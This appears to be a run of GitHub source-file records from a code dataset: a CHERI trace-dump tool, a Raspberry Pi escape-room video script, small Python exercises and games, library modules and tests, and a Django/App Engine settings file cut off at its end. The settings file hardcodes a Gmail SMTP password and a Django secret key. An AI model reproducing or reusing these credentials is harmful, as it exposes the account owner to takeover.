sym_reader\n \"\"\"Helper used to search symbols for addresses\"\"\"\n\n self.filters = [\n self._match_instr,\n self._match_pc,\n self._match_addr,\n self._match_reg,\n self._match_exception,\n self._match_nop,\n self._match_syscall,\n self._match_perm\n ]\n\n self.out = sys.stdout\n \"\"\"Output file stream\"\"\"\n\n if self.config.outfile:\n self.out = tempfile.NamedTemporaryFile(mode=\"w\")\n\n self.update_config(self.config)\n\n def update_config(self, config):\n self._entry_history = deque([], config.before)\n self._dump_next = 0\n self._kernel_mode = False\n\n def repr_register(self, entry):\n if (entry.gpr_number() != -1):\n return \"$%d\" % entry.gpr_number()\n elif (entry.capreg_number() != -1):\n return \"$c%d\" % entry.capreg_number()\n\n def dump_cap(self, cap):\n chericap = CheriCap(cap)\n return str(chericap)\n\n def dump_regs(self, entry, regs, last_regs):\n for idx in range(0,31):\n real_regnum = idx + 1\n self.out.write(\"[%d] $%d = %x\\n\" % (\n regs.valid_gprs[idx],\n real_regnum,\n regs.gpr[idx]))\n for idx in range(0,32):\n self.out.write(\"[%d] $c%d = %s\\n\" % (\n regs.valid_caps[idx], idx,\n self.dump_cap(regs.cap_reg[idx])))\n\n def dump_instr(self, inst, entry, idx):\n # self.out.write(str(inst))\n if entry.exception != 31:\n exception = \"except:%x\" % entry.exception\n else:\n # no exception\n exception = \"\"\n instr_dump = \"{%d:%d} 0x%x %s %s\" % (\n entry.asid, entry.cycles, entry.pc, inst.inst.name, exception)\n sym = None\n # XXX it would be nice to have an inst.is_branch property\n # it should be provided by LLVM quite easily\n if inst.opcode == \"cjalr\":\n sym_addr = inst.op1.value.base + inst.op1.value.offset\n sym = self.sym_reader.find_symbol(sym_addr)\n elif inst.opcode == \"cjr\":\n sym_addr = inst.op0.value.base + inst.op0.value.offset\n sym = self.sym_reader.find_symbol(sym_addr)\n elif inst.opcode == \"jalr\" or inst.opcode == \"jr\":\n sym_addr = inst.op0.value\n sym = self.sym_reader.find_symbol(sym_addr)\n if sym:\n instr_dump = \"%s (%s)\" % (instr_dump, sym)\n self.out.write(instr_dump)\n self.out.write(\"\\n\")\n # dump read/write\n if inst.cd is None:\n # no operands for the instruction\n return\n\n if entry.is_load or entry.is_store:\n sym = self.sym_reader.find_symbol(entry.memory_address)\n if sym:\n loc = \"[%x (%s)]\" % (entry.memory_address, sym)\n else:\n loc = \"[%x]\" % entry.memory_address\n if entry.is_load:\n self.out.write(\"$%s = %s\\n\" % (inst.cd.name, loc))\n else:\n self.out.write(\"%s = $%s\\n\" % (loc, inst.cd.name))\n\n if inst.op0.is_register:\n if (inst.op0.gpr_index != -1):\n gpr_value = inst.op0.value\n gpr_name = inst.op0.name\n if gpr_value is not None:\n self.out.write(\"$%s = %x\\n\" % (gpr_name, gpr_value))\n else:\n self.out.write(\"$%s = Unknown\\n\" % gpr_name)\n elif (inst.op0.cap_index != -1 or inst.op0.caphw_index != -1):\n cap_name = inst.op0.name\n cap_value = inst.op0.value\n if cap_value is not None:\n self.out.write(\"$%s = %s\\n\" % (\n cap_name, self.dump_cap(cap_value)))\n else:\n self.out.write(\"$%s = Unknown\\n\" % cap_name)\n\n def dump_kernel_user_switch(self, entry):\n if self._kernel_mode != entry.is_kernel():\n if entry.is_kernel():\n self.out.write(\"Enter kernel mode {%d:%d}\\n\" % (\n entry.asid, entry.cycles))\n else:\n self.out.write(\"Enter user mode {%d:%d}\\n\" % (\n entry.asid, entry.cycles))\n self._kernel_mode = entry.is_kernel()\n\n def do_dump(self, inst, entry, regs, last_regs, idx):\n # dump instr\n self.dump_instr(inst, entry, idx)\n if self.config.show_regs:\n self.dump_regs(entry, regs, last_regs)\n\n def _update_match_result(self, match, value):\n \"\"\"\n Combine the current match result with the value of\n a test according to the match mode\n \"\"\"\n if value is None:\n return match\n if self.config.match_any:\n return match or value\n else:\n return match and value\n\n def _check_limits(self, start, end, value):\n result = True\n if start != None and start > value:\n result = False\n if end != None and end < value:\n result = False\n return result\n\n def _match_instr(self, inst, regs):\n \"\"\"Check if the current instruction matches\"\"\"\n if self.config.instr:\n return self.config.instr == inst.opcode\n return None\n\n def _match_pc(self, inst, regs):\n \"\"\"Check if the current instruction PC matches\"\"\"\n if self.config.pc:\n start, end = self.config.pc\n return self._check_limits(start, end, inst.entry.pc)\n return None\n\n def _match_addr(self, inst, regs):\n \"\"\"Check if the current load or store address matches\"\"\"\n if self.config.mem:\n if inst.entry.is_load or inst.entry.is_store:\n start, end = self.config.mem\n return self._check_limits(start, end, inst.entry.memory_address)\n else:\n return False\n return None\n\n def _match_reg(self, inst, regs):\n \"\"\"Check if the current instruction uses a register\"\"\"\n if self.config.reg:\n for operand in inst.operands:\n if not operand.is_register:\n continue\n if operand.name == self.config.reg:\n return True\n return False\n return None\n\n def _match_exception(self, inst, regs):\n \"\"\"Check if an exception occurred while executing an instruction\"\"\"\n if self.config.exception:\n if inst.entry.exception == 31:\n # no exception\n return False\n elif self.config.exception == \"any\":\n return True\n else:\n return inst.entry.exception == int(self.config.exception)\n return None\n\n def _match_syscall(self, inst, regs):\n \"\"\"Check if this instruction is a syscall with given code\"\"\"\n # system call code is in v0\n code_reg = 2\n if self.config.syscall:\n if inst.opcode == \"syscall\" and inst.entry.exception == 8:\n if (regs.valid_grps[code_reg] and\n regs.gpr[code_reg] == self.config.syscall):\n return True\n return False\n return None\n\n def _match_perm(self, inst, regs):\n \"\"\"Check if this instruction uses capabilities with the given perms\"\"\"\n if self.config.perms:\n for operand in inst.operands:\n if (not operand.is_capability or\n operand.value is None):\n # if not a capability or the register in the register set\n # is not valid\n continue\n cap_reg = CheriCap(operand.value)\n if cap_reg.has_perm(self.config.perms):\n return True\n return False\n return None\n\n def _match_nop(self, inst, regs):\n \"\"\"Check if instruction is a given canonical NOP\"\"\"\n if self.config.nop:\n if inst.opcode == \"lui\":\n return (inst.op0.gpr_index == 0 and\n inst.op1.value == self.config.nop)\n return False\n return None\n\n def scan_all(self, inst, entry, regs, last_regs, idx):\n if self._dump_next > 0:\n self.dump_kernel_user_switch(entry)\n self._dump_next -= 1\n self.do_dump(inst, entry, regs, last_regs, idx)\n else:\n # initial match value, if match_any is true\n # we OR the match results so start with false\n # else we AND them, so start with true\n match = not self.config.match_any\n for checker in self.filters:\n result = checker(inst, regs)\n match = self._update_match_result(match, result)\n if match:\n self.dump_kernel_user_switch(entry)\n # dump all the instructions in the queue\n while len(self._entry_history) > 0:\n old_inst, idx = self._entry_history.popleft()\n self.do_dump(old_inst, old_inst.entry, old_inst._regset,\n old_inst._prev_regset, idx)\n try:\n self.do_dump(inst, entry, regs, last_regs, idx)\n except Exception as e:\n logger.error(\"Can not dump instruction %s: %s\",\n inst, e)\n return True\n self._dump_next = self.config.after\n else:\n self._entry_history.append((inst, idx))\n return False\n\n def parse(self, start=None, end=None, direction=0):\n start = start or self.config.start\n end = end or self.config.end\n if self.config.info:\n self.out.write(\"Trace size: %s\\n\" % len(self))\n else:\n super().parse(start, end)\n\n def mp_result(self):\n \"\"\"Return the temporary file.\"\"\"\n self.out.flush()\n return self.out.name\n\n def mp_merge(self, results):\n \"\"\"Concatenate temporary files\"\"\"\n if self.config.outfile:\n with open(self.config.outfile, 'wb') as out:\n for in_file in results:\n with open(in_file,'rb') as fd:\n shutil.copyfileobj(fd, out, 1024*1024*50)\n\n\n@interactive_tool(key=\"scan\")\nclass PytracedumpDriver(BaseTraceTaskDriver):\n\n description = \"\"\"Dump CHERI binary trace.\n Each instruction entry has the following format:\n {:} \n\n Memory accesses show the referenced address in the line below:\n = [] or [] = \n\n Capabilities as displayed in the following format:\n [b: o: l: p: t: v: s:]\n t_alloc and t_free are only relevant in the provenance graph.\n\n When dumping the register set, the format of each entry is the following:\n [] = \"\"\"\n\n scan = NestedConfig(TraceDumpParser)\n symbols_path = Option(\n nargs=\"*\",\n help=\"Path where to look for binaries in the vmmap, \"\n \"default is current directory.\",\n default=[\".\"])\n vmmap = NestedConfig(VMMapFileParser)\n threads = Option(\n type=int,\n default=1,\n help=\"Run the tool with the given number of workers\")\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.vmmap = VMMapFileParser(config=self.config.vmmap)\n self.vmmap.parse()\n self.symbols = SymReader(vmmap=self.vmmap,\n path=self.config.symbols_path)\n self.parser = TraceDumpParser(trace_path=self.config.trace,\n sym_reader=self.symbols,\n config=self.config.scan,\n threads=self.config.threads)\n\n def update_config(self, config):\n super().update_config(config)\n self.parser.update_config(config.scan)\n\n def run(self):\n self.parser.parse(self.config.scan.start, self.config.scan.end)\n","repo_name":"CTSRD-CHERI/cheriplot","sub_path":"cheriplot/dbg/tracedump.py","file_name":"tracedump.py","file_ext":"py","file_size_in_byte":15919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16733377728","text":"import RPi.GPIO as GPIO\nimport time\nfrom omxplayer.player import OMXPlayer\n\nflag = 0\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(25, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(8, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(7, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(1, GPIO.OUT)\nGPIO.output(1, GPIO.LOW)\n\nplayer = OMXPlayer('/video/30sec.mp4')\ntime.sleep(0.5)\n\nwhile GPIO.input(7)==0:\n if player.position()>5: player.set_position(0)\n\nwhile True:\n if GPIO.input(25)==1:\n print(\"GPIO 25 1\")\n if player.position()<5:\n player.play()\n print(\"play\")\n else:\n print(\"pause\")\n player.pause()\n while GPIO.input(25)==1:\n print(\"GPIO 25 1 wait 8 and 7\")\n time.sleep(0.5)\n if GPIO.input(25)==1 and GPIO.input(8)==1 and GPIO.input(7)==1:\n if player.position()>10.0:\n player.pause()\n flag = 1\n GPIO.output(1, GPIO.HIGH)\n else:\n player.play()\n elif GPIO.input(25)==0:\n print(\"GPIO 25 0\")\n if flag == 1:\n while True:\n GPIO.output(1, GPIO.HIGH)\n if GPIO.input(25)==0:\n print(\"RESTART! RESTART! RESTART!\")\n player.set_position(0)\n player.play()\n time.sleep(0.5)\n player.pause()\n","repo_name":"monstror/dracula-escape-","sub_path":"картина 1 нажатия/vid.py","file_name":"vid.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14859679636","text":"#First we'll import the os module\n# This will allow us to create file paths across operating systems\nimport os\n\n# Module for reading CSV files\nimport csv\n\ncsvpath = os.path.join('Resources', 'Budget_data.csv')\ntotalmonths=0\ntotalvalue=0\nCurrent=0\nPrevious=0\nTotalchanges=0\nListfordifferences=[]\nnum= input(\"how many numbers:\")\nwith open(csvpath) as csvfile:\n\n # CSV reader specifies delimiter and variable that holds contents\n csvreader = csv.reader(csvfile, delimiter=',')\n\n \n\n # Read the header row first (skip this step if there is now header)\n csv_header = next(csvreader)\n print(f\"CSV Header: {csv_header}\")\n\n # Read each row of data after the header\n for row in csvreader:\n \n totalmonths=totalmonths+1\n totalvalue=totalvalue+int(row[1])\n Current=int(row[1])\n Change= Current-Previous\n if Previous==0:\n Previous=Current\n elif Previous!=int(Current):\n Change= Current-Previous \n Previous=Current\n Listfordifferences.append(Change)\n if totalmonths>1:\n Totalchanges= Totalchanges+Change\nAveragechange= Totalchanges/(totalmonths-1) \nCurrent=0\nPrevious=0\nfor amount in Listfordifferences:\n Current=amount\n if Previous==0:\n Previous=Current\n\n elif Current>Previous:\n greatestincrease=Current\n Previous=Current\n elif Current Email.id\")\n ]\n\n person_json = {\"id\": 5, \"name\": \"Jill\", \"email_id\": 4}\n email_json = {\"id\": 4, \"address\": \"jill@hill.org\"}\n\n e = Email.load(email_json)\n p = Person.load(person_json)\n\n assert p.email == e\n\ndef test_load_many(mybase):\n\n @add_schema\n class Email(mybase):\n items = []\n FIELDS = [\"id\", \"address\"]\n RELATIONSHIPS = [\n One(\"person\", \"find Email.person_id <> Person.id\")\n ]\n\n email_json = [\n {\"id\": 4, \"address\": \"jill@hill.org\"},\n {\"id\": 5, \"address\": \"jill2@hill.org\"},\n {\"id\": 6, \"address\": \"jill3@hill.org\"}\n ]\n\n emails = Email.load(email_json)\n assert len(emails) == len(email_json)\n\ndef test_additional_fields(mybase):\n\n @add_schema\n class Email(mybase):\n items = []\n FIELDS = [\"id\", \"address\"]\n RELATIONSHIPS = [\n One(\"person\", \"find Email.person_id <> Person.id\")\n ]\n\n email_json = {\"id\": 4, \"address\": \"jill@hill.org\", \"additional_field\": 6}\n\n email = Email.load(email_json)\n print(email.additional_field)\n\n\n # assert p.description == person_data[\"description\"]","repo_name":"jvrana/Pillowtalk","sub_path":"tests/test_basics/test_basic.py","file_name":"test_basic.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73524230248","text":"\"\"\"\nPyCBA - Continuous Beam Analysis - Influence Lines Module\n\"\"\"\nfrom typing import Optional, Union\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom .analysis import BeamAnalysis\n\n\nclass InfluenceLines:\n \"\"\"\n Creates influence lines for an arbitrary beam configuration using CBA\n \"\"\"\n\n def __init__(\n self,\n L: np.ndarray,\n EI: Union[float, np.ndarray],\n R: np.ndarray,\n eletype: Optional[np.ndarray] = None,\n ):\n \"\"\"\n Constructs an influence line object for a beam\n\n Parameters\n ----------\n L : np.ndarray\n A vector of span lengths.\n EI : Union[float, np.ndarray]\n A vector of member flexural rigidities.\n R : np.ndarray\n A vector describing the support conditions at each member end.\n eletype : Optional[np.ndarray]\n A vector of the member types. Defaults to a fixed-fixed element.\n\n Returns\n -------\n None.\n\n \"\"\"\n self.ba = BeamAnalysis(L=L, EI=EI, R=R, eletype=eletype)\n self.L = self.ba.beam.length\n self.vResults = []\n self.pos = []\n\n def create_ils(self, step: Optional[float] = None, load_val: float = 1.0):\n \"\"\"\n Creates the influence lines by marching the unit load (`load_val`) across\n the defined beam configuration in `step` distance increments, storing the\n static analysis results in a vector of :class:`pycba.results.BeamResults`.\n\n Parameters\n ----------\n step : Optional[float]\n The distance increment to move the unit load; defaults to beam length / 100.\n load_val : float, optional\n The nominal value of the \"unit load\". The default is 1.0.\n\n Raises\n ------\n ValueError\n If a static beam analysis does not succeed, usually due to a beam\n configuration error.\n\n Returns\n -------\n None.\n \"\"\"\n self.vResults = [] # reset\n\n if step is None:\n step = self.L / 100\n\n npts = round(self.L / step) + 1\n\n for i in range(npts):\n # load position\n pos = i * step\n self.pos.append(pos)\n # locate load on span\n ispan, pos_in_span = self.ba.beam.get_local_span_coords(pos)\n if ispan == -1:\n load_val = 0.0\n # assemble and set load matrix\n self.ba.set_loads([[ispan + 1, 2, load_val, pos_in_span, 0]])\n # analyze\n out = self.ba.analyze()\n if out != 0:\n raise ValueError(\"IL analysis did not succeed\")\n return\n self.vResults.append(self.ba.beam_results)\n\n def get_il(self, poi: float, load_effect: str) -> (np.ndarray, np.ndarray):\n \"\"\"\n Returns the influence line at a point of interest for a load effect.\n\n Parameters\n ----------\n poi : float\n The position of interest in global coordinates along the length of the\n beam.\n load_effect : str\n A single character to identify the load effect of interest, currently\n one of:\n\n - **V**: shear force\n - **M**: bending moment\n - **R**: vertical reaction at a fully restrained support\n\n The vertical reaction nearest the `poi` is used. For moment reactions\n use a poi at or just beside the support.\n\n Returns\n -------\n (x,eta) : tuple(np.ndarray,np.ndarray)\n A tuple of the vectors of abcissa and influence ordinates.\n \"\"\"\n if not self.vResults:\n self.create_ils()\n\n x = self.vResults[0].results.x\n dx = x[2] - x[1]\n idx = np.where(np.abs(x - poi) <= dx * 1e-6)[0][0]\n # find the nearest support to the poi\n idxr = (\n np.abs(np.cumsum(np.insert(self.ba.beam.mbr_lengths, 0, 0)) - poi)\n ).argmin()\n npts = len(self.vResults)\n eta = np.zeros(npts)\n\n for i, res in enumerate(self.vResults):\n if load_effect == \"V\":\n eta[i] = res.results.V[idx]\n elif load_effect == \"R\":\n eta[i] = res.R[idxr]\n else:\n eta[i] = res.results.M[idx]\n\n return (np.array(self.pos), eta)\n\n def plot_il(self, poi: float, load_effect: str, ax: Optional[plt.Axes] = None):\n \"\"\"\n Retrieves and plots the IL on either a supplied or new axes.\n\n Parameters\n ----------\n poi : float\n The position of interest in global coordinates along the length of the\n beam.\n load_effect : str\n A single character to identify the load effect of interest, currently\n one of:\n\n - **V**: shear force\n - **M**: bending moment\n - **R**: vertical reaction at a fully restrained support\n\n The vertical reaction nearest the `poi` is used. For moment reactions\n use a poi at or just beside the support.\n ax : Optional[plt.Axes]\n A user-supplied matplotlib Axes object; when None (default), one is\n created for the plot.\n \"\"\"\n\n (x, y) = self.get_il(poi, load_effect)\n\n if ax is None:\n fig, ax = plt.subplots()\n\n ax.plot([0, self.L], [0, 0], \"k\", lw=2)\n ax.plot(x, y, \"r\")\n ax.grid()\n ax.set_ylabel(\"Influence Ordinate\")\n ax.set_xlabel(\"Distance along beam (m)\")\n ax.set_title(f\"IL for {load_effect} at {poi}\")\n plt.tight_layout()\n","repo_name":"ccaprani/pycba","sub_path":"src/pycba/inf_lines.py","file_name":"inf_lines.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"53"} +{"seq_id":"9880048477","text":"# one_off_type_start\n\nfrom dagster import DagsterType, check_dagster_type\n\nset_containing_1 = DagsterType(\n name=\"set_containing_1\",\n description=\"A set containing the value 1. May contain any other values.\",\n type_check_fn=lambda _context, obj: isinstance(obj, set) and 1 in obj,\n)\n\nassert check_dagster_type(set_containing_1, {1, 2}).success # => True\n\n# one_off_type_end\n\n# type_factory_start\n\n\ndef set_has_element_type_factory(x):\n return DagsterType(\n name=f\"set_containing_{x}\",\n description=f\"A set containing the value {x}. May contain any other values.\",\n type_check_fn=lambda _context, obj: isinstance(obj, set) and x in obj,\n )\n\n\nset_containing_2 = set_has_element_type_factory(2)\nassert check_dagster_type(set_containing_2, {1, 2}).success # => True\n\n# type_factory_end\n","repo_name":"dagster-io/dagster","sub_path":"examples/docs_snippets/docs_snippets/guides/dagster/dagster_type_factories/simple_example.py","file_name":"simple_example.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"41522349052","text":"# Main program to keep a grid certification up to date.\nfrom ruciopylib.cert import cert\nfrom retry import retry\nimport os\nimport shutil\nimport logging\n\n\ndef copy_if_exists(source, dest):\n 'Copy a file if it exists'\n if os.path.exists(source):\n shutil.copyfile(source, dest)\n\n\n@retry(delay=5 * 60)\ndef setup_certs():\n '''Locate a cert and copy it over, and get it ready for use.\n We just hang if we can't find certs to use.\n '''\n globus_directory = os.path.expanduser('~/.globus')\n if not os.path.exists(globus_directory):\n logging.info(f'Creating the {globus_directory} directory')\n os.mkdir(globus_directory)\n\n # First, see if they exist in certs\n copy_if_exists('/certs/userkey.pem', f'{globus_directory}/userkey.pem')\n copy_if_exists('/certs/usercert.pem', f'{globus_directory}/usercert.pem')\n\n # Next, in the globus area, make sure the permissions are right.\n os.chmod(f'{globus_directory}/userkey.pem', 0o400)\n os.chmod(f'{globus_directory}/usercert.pem', 0o444)\n\n\ndef do_cert():\n logging.info('Setting up certs for use')\n setup_certs()\n logging.info(\"Starting registration loop\")\n c = cert()\n c.run_registration_loop(log_func=lambda l: logging.info(l))\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n do_cert()\n","repo_name":"gordonwatts/func-adl-rucio","sub_path":"tools/cert_manager.py","file_name":"cert_manager.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36092441477","text":"#!/usr/bin/env python3\n\nimport random\n\n\"\"\"This program plays a game of Rock, Paper, Scissors between two Players,\nand reports both Player's scores each round.\"\"\"\n\n\"\"\"The Player class is the parent class for all of the Players\nin this game\"\"\"\n\n\nclass Player:\n\n def __init__(self):\n self.my_move = None\n self.their_move = None\n\n def learn(self, my_move, their_move):\n pass\n\n\nclass AllRockPlayer(Player):\n\n def __init__(self):\n self.name = \"Rock Player\"\n\n def get_choice(self):\n return 'rock'\n\n\nclass RandomPlayer(Player):\n\n def __init__(self):\n self.name = \"Random Player\"\n self.p1 = random.choice([\"rock\", \"paper\", \"scissors\"])\n self.p2 = random.choice([\"rock\", \"paper\", \"scissors\"])\n\n def get_choice(self):\n return self.p1\n\n def moveplay(self):\n return self.p2\n\n\nclass HumanPlayer(Player):\n\n def __init__(self):\n self.choices = [\"rock\", \"paper\", \"scissors\"]\n\n def player_choice(self):\n print(\"Enter your choice: (rock, paper, scissors)\")\n my_choice = input().lower()\n if my_choice not in self.choices:\n print(\"Invalid choice. \\n\\\n Please choose from rock, paper, or scissors.\")\n return self.player_choice()\n return my_choice\n\n\nclass ReflectPlayer(Player):\n\n def __init__(self):\n self.name = \"Reflect Player\"\n self.my_move = None\n self.their_move = None\n\n def get_choice(self):\n if self.their_move is not None:\n return self.their_move\n else:\n return random.choice([\"rock\", \"paper\", \"scissors\"])\n\n def learn(self, my_move, their_move):\n self.my_move = my_move\n self.their_move = their_move\n\n\nclass CyclePlayer(Player):\n\n def __init__(self):\n self.name = \"Cycle Player\"\n self.my_move = None\n self.their_move = None\n self.playchoice = [\"rock\", \"paper\", \"scissors\"]\n self.currentmove = 0\n\n def get_choice(self):\n if self.their_move is not None:\n self.currentmove = (self.currentmove + 1) % len(self.playchoice)\n return self.playchoice[self.currentmove]\n else:\n return random.choice(self.playchoice)\n\n def learn(self, my_move, their_move):\n self.my_move = my_move\n self.their_move = their_move\n\n\nclass Game:\n\n def __init__(self):\n self.choices = [\"rock\", \"paper\", \"scissors\"]\n self.player_score = 0\n self.computer_score = 0\n self.computer2_score = 0\n self.round = 0\n self.opponent = random.choice([\n AllRockPlayer(),\n RandomPlayer(),\n ReflectPlayer(),\n CyclePlayer()\n ])\n\n def get_player_choice(self):\n return HumanPlayer().player_choice()\n\n def get_computer_choice(self):\n return RandomPlayer().get_choice()\n\n def get_computer2_choice(self):\n return RandomPlayer().moveplay()\n\n def determine_winner_pc(self, player_choice, computer_choice):\n if player_choice == computer_choice:\n return \"It's a tie!\"\n elif (player_choice == \"rock\" and computer_choice == \"scissors\") or \\\n (player_choice == \"paper\" and computer_choice == \"rock\") or \\\n (player_choice == \"scissors\" and computer_choice == \"paper\"):\n self.player_score += 1\n return \"You win!\"\n else:\n self.computer_score += 1\n return \"Computer wins!\"\n\n def play_pc(self):\n self.round += 1\n player_choice = self.get_player_choice()\n computer_choice = self.opponent.get_choice()\n self.opponent.learn(computer_choice, player_choice)\n print(f\"You are playing against {self.opponent.name}\")\n print(f\"Round {self.round}\")\n print(f\"You chose {player_choice}.\\n\\\nComputer chose {computer_choice}.\")\n result = self.determine_winner_pc(player_choice, computer_choice)\n print(result)\n print(f\"Player: {self.player_score}\\n\\\nComputer: {self.computer_score}\")\n\n play_again = input(\"Play again?\\n\\\nReply 'yes' to continue or reply with anything else to quit : \").lower()\n if play_again == \"yes\":\n game.play_pc()\n else:\n if self.player_score > self.computer_score:\n print(f\"Your score is {self.player_score},\\n\\\nThe computer score is {self.computer_score}.\\n\\\nYou won this game!!!\")\n elif self.player_score < self.computer_score:\n print(f\"Your score is {self.player_score},\\n\\\nThe computer score is {self.computer_score}.\\n\\\nThe Computer won this game!!!\")\n else:\n print(f\"Your score is {self.player_score},\\n\\\nThe computer score is {self.computer_score}.\\n\\\nThis game is a tie!!!\")\n print(\"Thanks for playing!\")\n\n def determine_winner_cc(self, computer_choice, computer2_choice):\n if computer_choice == computer2_choice:\n return \"It's a tie!\"\n elif (computer_choice == \"rock\" and computer2_choice == \"scissors\") \\\n or (computer_choice == \"paper\" and computer2_choice == \"rock\") \\\n or (computer_choice == \"scissors\" and\n computer2_choice == \"paper\"):\n self.computer_score += 1\n return \"Player 1 win!\"\n else:\n self.computer2_score += 1\n return \"Player 2 wins!\"\n\n def play_cc(self):\n self.round += 1\n computer_choice = self.get_computer_choice()\n computer2_choice = self.get_computer2_choice()\n print(f\"Round {self.round}\")\n print(f\"Player 1 chose {computer_choice}.\\n\\\nPlayer 2 chose {computer2_choice}.\")\n result = self.determine_winner_cc(computer_choice,\n computer2_choice)\n print(result)\n print(f\"Player 1: {self.computer_score}\\n\\\nPlayer 2: {self.computer2_score}\")\n\n play_again = input(\"Play again?\\n\\\nReply 'yes' to continue or reply with anything else to quit) : \").lower()\n if play_again == \"yes\":\n game.play_cc()\n else:\n if self.computer2_score > self.computer_score:\n print(f\"Player 1 score is {self.computer_score},\\n\\\nPlayer 2 score is {self.computer2_score}.\\n\\\nPlayer 2 won this game!!!\")\n elif self.computer2_score < self.computer_score:\n print(f\"Player 1 score is {self.computer_score},\\n\\\nPlayer 2 score is {self.computer2_score}.\\n\\\nPlayer 1 won this game!!!\")\n else:\n print(f\"Player 1 score is {self.computer_score},\\n\\\nPlayer 2 score is {self.computer2_score}.\\n\\\nThis game is a tie!!!\")\n print(\"Thanks for playing!\")\n\n def start(self):\n gameselect = int(input())\n if gameselect == 0:\n game.play_cc()\n elif gameselect == 1:\n game.play_pc()\n else:\n print(\"Invalid selection, Please try again\")\n self.start()\n\n\nif __name__ == \"__main__\":\n game = Game()\n print(\"How many players? (Enter 0 or 1)\")\n game.start()\n\n","repo_name":"Zymoclassic/tutorials","sub_path":"rps.py","file_name":"rps.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14986023600","text":"class Solution:\n def calcEquation(self, eq: List[List[str]], val: List[float], qu: List[List[str]]) -> List[float]:\n m=collections.defaultdict(dict)\n for (x,y),v in zip(eq,val):\n m[x][y]=v\n m[y][x]=1/v\n \n def bfs(st,dt):\n if not( st in m and dt in m): return -1.0\n q,seen=[(st,1.0)],set()\n for x,v in q:\n if x==dt:\n return v\n seen.add(x)\n for y in m[x]:\n if y not in seen:\n q.append((y,(v*m[x][y])))\n return -1.0\n return [bfs(s,d) for s,d in qu]","repo_name":"Anushree1291/Leetcode-solutions","sub_path":"0399-evaluate-division/0399-evaluate-division.py","file_name":"0399-evaluate-division.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11063613556","text":"from djangoappengine.settings_base import *\nimport os\n\nDATABASES['native'] = DATABASES['default']\nDATABASES['default'] = {'ENGINE': 'dbindexer', 'TARGET': 'native'}\nAUTOLOAD_SITECONF = 'indexes'\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Alejandro Saucedo', 'hackasoton@gmail.com'),\n)\n\nMANAGERS = ADMINS\n\n#Use email\nEMAIL_USE_TLS = True\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_PORT = 25\nEMAIL_HOST_USER = 'hackasoton@gmail.com'\nEMAIL_HOST_PASSWORD = 'HackaS0t0n'\n\nDEFAULT_FROM_EMAIL = 'hackasoton@gmail.com'\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n\nALLOWED_HOSTS = [ '.events-finder.appspot.com/']\n\nTIME_ZONE = 'Europe/London'\nLANGUAGE_CODE = 'en-gb'\n\nSITE_ID = 1\n\n# Use optimizations\nUSE_I18N = True\n\n# Django should format dates\nUSE_L10N = True\n\n# Application is not timezone aware\nUSE_TZ = False\n\nAPPEND_SLASH = True\n\n# Media files\nMEDIA_ROOT = os.path.abspath(os.path.join(os.path.dirname( __file__ ), 'media'))\nMEDIA_URL = '/media/'\nMAX_UPLOAD_SIZE = 20971520\nCONTENT_TYPES = ['image/jpeg', 'image/png']\n\n# Static Files\nSTATIC_ROOT = os.path.abspath(os.path.join(os.path.dirname( __file__ ), 'static'))\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = ()\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'djangotoolbox',\n 'autoload',\n 'dbindexer',\n\n #'httplib2',# These 4 are\n #'openid',# what u need to\n #'oauth2',# integrate social_auth plug\n 'social_auth',# in your GAE project\n\n # djangoappengine should come last, so it can override a few manage.py commands\n 'djangoappengine',\n\n 'eventsfinder'\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'nqc8l#-7^n-$v^ls=v%t#1pq&j(i__heue^xvjhdt=om5!98#!'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.request',\n 'django.core.context_processors.media',\n \"eventsfinder.ef_context.in_prod\",\n \"social_auth.context_processors.social_auth_by_type_backends\"\n)\n\nMIDDLEWARE_CLASSES = (\n 